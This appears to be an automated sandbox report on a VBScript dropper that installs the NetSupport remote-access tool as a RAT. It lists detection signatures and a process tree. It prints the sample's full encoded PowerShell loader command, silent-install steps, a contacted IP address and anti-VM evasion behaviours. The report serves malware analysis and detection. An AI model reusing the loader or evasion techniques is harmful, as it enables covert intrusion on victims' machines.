Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Pyyidau.vbs

Overview

General Information

Sample name:Pyyidau.vbs
Analysis ID:1561295
MD5:c1108260f7a287cb16f93c11a40fbf90
SHA1:8eab07aef27baae17d1ce013cce58b2b43dcaa1d
SHA256:484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c
Infos:

Detection

NetSupport RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious encrypted Powershell command line found
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
.NET source code contains potential unpacker
Contains functionality to automate explorer (e.g. start an application)
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Enables network access during safeboot for specific services
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Potential malicious VBS script found (has network functionality)
Potential malicious VBS script found (suspicious strings)
Powershell is started from unusual location (likely to bypass HIPS)
Queries memory information (via WMI often done to detect virtual machines)
Queries pointing device information (via WMI, Win32_PointingDevice, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Reads the Security eventlog
Reads the System eventlog
Sample is not signed and drops a device driver
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Uses dynamic DNS services
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries device information via Setup API
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Execution From GUID Like Folder Names
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected NetSupport remote tool

Classification

Process Tree

  • System is w10x64native
  • wscript.exe (PID: 6228 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • Pyyidau.vbs.exe (PID: 5876 cmdline: "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc JABBAHEAdwB3AHMAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABHAHkAaQBlAHAAZwBrAHcAdgByACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQAQQBxAHcAdwBzAGMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEcAeQBpAGUAcABnAGsAdwB2AHIALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEkAdwBxAGIAdwBjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAIAApADsAJABFAG0AYgBtAGUAcwBqAHMAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAUgB3AHAAdQB4AHcAYQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABJAHcAcQBiAHcAYwAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbwBwAHkAVABvACgAIAAkAEUAbQBiAG0AZQBzAGoAcwBsACAAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbABvAHMAZQAoACkAOwAkAEkAdwBxAGIAdwBjAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgACQARQBtAGIAbQBlAHMAagBzAGwALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFgAcwBsAG0AdwBtAG8AcQBnAGsAegApADsAIAAkAE4AZgBrAGYAZwB0AHQAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABoAHIAZQBhAGQAaQBuAGcALgBUAGgAcgBlAGEAZABdADoAOgBHAGUAdABEAG8AbQBhAGkAbgAoACkALgBMAG8AYQBkACgAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAKQA7ACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0AIAA9ACAAJABOAGYAawBmAGcAdAB0AHIALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEEAdgBmAG4AeAB1AGsAbgByAG0AbQAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA= MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • wscript.exe (PID: 2216 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs" MD5: 4D780D8F77047EE1C65F747D9F63A1FE)
        • msiexec.exe (PID: 8392 cmdline: "C:\Windows\SysWOW64\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\vrep.msi" /quiet MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • RegAsm.exe (PID: 7040 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 7860 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 8212 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 8220 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 8228 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 8236 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 8244 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 8260 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 8268 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 8276 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cmd.exe (PID: 6588 cmdline: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Pyyidau.vbs.exe" /Y MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • msiexec.exe (PID: 8432 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 8516 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding F1F5193EAAA26C6686643ED3090C1E98 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • cmd.exe (PID: 8936 cmdline: cmd.exe /c ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • attrib.exe (PID: 9000 cmdline: ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
    • MSIF373.tmp (PID: 9036 cmdline: "C:\Windows\Installer\MSIF373.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EU MD5: 0FCF65C63E08E77732224B2D5D959F13)
    • msiexec.exe (PID: 9088 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 6A6FD5B6F4DA3E504B51BAF4C9444B82 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MSIF985.tmp (PID: 9148 cmdline: "C:\Windows\Installer\MSIF985.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EU MD5: 0FCF65C63E08E77732224B2D5D959F13)
    • checkdvd.exe (PID: 9208 cmdline: "C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe" MD5: FE7D9DC26FF1615C13722E0F2DD3B815)
    • MSI1387.tmp (PID: 2428 cmdline: "C:\Windows\Installer\MSI1387.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EV"NetSupport School" /EF".\Log Files" /EF".\Bookmarks" /EF".\Tests" /EF".\Store" /EF".\inv" /EF".\Resources" /EF".\Help" /EF".\Image" /EF".\Sound" /EF".\Video" /EA /EX /EC /Q /V /Q /I * MD5: 0FCF65C63E08E77732224B2D5D959F13)
      • winst64.exe (PID: 3360 cmdline: winst64.exe /q /q /ex /i MD5: 96E987D909600D34DD70C55F56EB8869)
    • MSI23E6.tmp (PID: 6204 cmdline: "C:\Windows\Installer\MSI23E6.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EI MD5: 0FCF65C63E08E77732224B2D5D959F13)
    • pcicfgui_client.exe (PID: 7388 cmdline: "C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe" /Q "C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32.ini" MD5: B8ACD5C9E200166C6B4E5001AEEEAF20)
      • pcicfgui_client.exe (PID: 7108 cmdline: "C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe" MD5: B8ACD5C9E200166C6B4E5001AEEEAF20)
  • client32.exe (PID: 3456 cmdline: "C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" /* * MD5: 297EA82401ACBEAD6BA4B19880DF2B8C)
    • client32.exe (PID: 8368 cmdline: "C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" * /VistaUI MD5: 297EA82401ACBEAD6BA4B19880DF2B8C)
      • cscript.exe (PID: 2232 cmdline: "cscript.exe" C:\Windows\system32\Printing_Admin_Scripts\en-US\prnport.vbs -a -r NSM001 -h 127.0.0.1 -o raw -n 49749 MD5: 13783FF4A2B614D7FBD58F5EEBDEDEF6)
        • conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • svchost.exe (PID: 3652 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv MD5: F586835082F632DC8D9404D83BC16316)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Program Files (x86)\NetSupport\NetSupport Manager\nspowershell.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\Program Files (x86)\NetSupport\NetSupport Manager\CryptPak.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst64.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\Config.Msi\e6def9.rbsJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\Program Files (x86)\NetSupport\NetSupport Manager\injlib.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 65 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000020.00000003.114561669687.0000000000A25000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              00000020.00000002.115179006644.0000000001266000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                0000001E.00000000.114225718112.00007FF679386000.00000002.00000001.01000000.00000010.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  00000020.00000003.115069209517.0000000000A56000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    00000020.00000002.115177447611.0000000000A44000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      Click to see the 77 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      34.2.pcicfgui_client.exe.701b0000.6.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        35.2.pcicfgui_client.exe.df0000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          32.2.client32.exe.701b0000.9.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            33.0.client32.exe.1f0000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                              32.2.client32.exe.1f0000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                Click to see the 39 entries

                                Sigma Signatures

                                System Summary

                                barindex
                                Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc JABBAHEAdwB3AHMAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABHAHkAaQBlAHAAZwBrAHcAdgByACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQAQQBxAHcAdwBzAGMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEcAeQBpAGUAcABnAGsAdwB2AHIALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEkAdwBxAGIAdwBjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAIAApADsAJABFAG0AYgBtAGUAcwBqAHMAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAUgB3AHAAdQB4AHcAYQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABJAHcAcQBiAHcAYwAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbwBwAHkAVABvACgAIAAkAEUAbQBiAG0AZQBzAGoAcwBsACAAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbABvAHMAZQAoACkAOwAkAEkAdwBxAGIAdwBjAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgACQARQBtAGIAbQBlAHMAagBzAGwALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFgAcwBsAG0AdwBtAG8AcQBnAGsAegApADsAIAAkAE4AZgBrAGYAZwB0AHQAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABoAHIAZQBhAGQAaQBuAGcALgBUAGgAcgBlAGEAZABdADoAOgBHAGUAdABEAG8AbQBhAGkAbgAoACkALgBMAG8AYQBkACgAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAKQA7ACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0AIAA9ACAAJABOAGYAawBmAGcAdAB0AHIALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEEAdgBmAG4AeAB1AGsAbgByAG0AbQAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=, CommandLine: "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc JABBAHEAdwB3AHMAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABHAHkAaQBlAHAAZwBrAHcAdgByACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQAQQBxAHcAdwBzAGMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEcAeQBpAGUAcABnAGsAdwB2AHIALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcA
                                Sigma detected: Script Initiated Connection to Non-Local Network
                                Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 176.126.113.166, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 2216, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49742
                                Sigma detected: Script Interpreter Execution From Suspicious Folder
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc JABBAHEAdwB3AHMAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABHAHkAaQBlAHAAZwBrAHcAdgByACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQAQQBxAHcAdwBzAGMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEcAeQBpAGUAcABnAGsAdwB2AHIALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEkAdwBxAGIAdwBjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAIAApADsAJABFAG0AYgBtAGUAcwBqAHMAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAUgB3AHAAdQB4AHcAYQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABJAHcAcQBiAHcAYwAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbwBwAHkAVABvACgAIAAkAEUAbQBiAG0AZQBzAGoAcwBsACAAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbABvAHMAZQAoACkAOwAkAEkAdwBxAGIAdwBjAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgACQARQBtAGIAbQBlAHMAagBzAGwALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFgAcwBsAG0AdwBtAG8AcQBnAGsAegApADsAIAAkAE4AZgBrAGYAZwB0AHQAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABoAHIAZQBhAGQAaQBuAGcALgBUAGgAcgBlAGEAZABdADoAOgBHAGUAdABEAG8AbQBhAGkAbgAoACkALgBMAG8AYQBkACgAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAKQA7ACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0AIAA9ACAAJABOAGYAawBmAGcAdAB0AHIALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEEAdgBmAG4AeAB1AGsAbgByAG0AbQAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=, ParentImage: C:\Users\user\Desktop\Pyyidau.vbs.exe, ParentProcessId: 5876, ParentProcessName: Pyyidau.vbs.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" 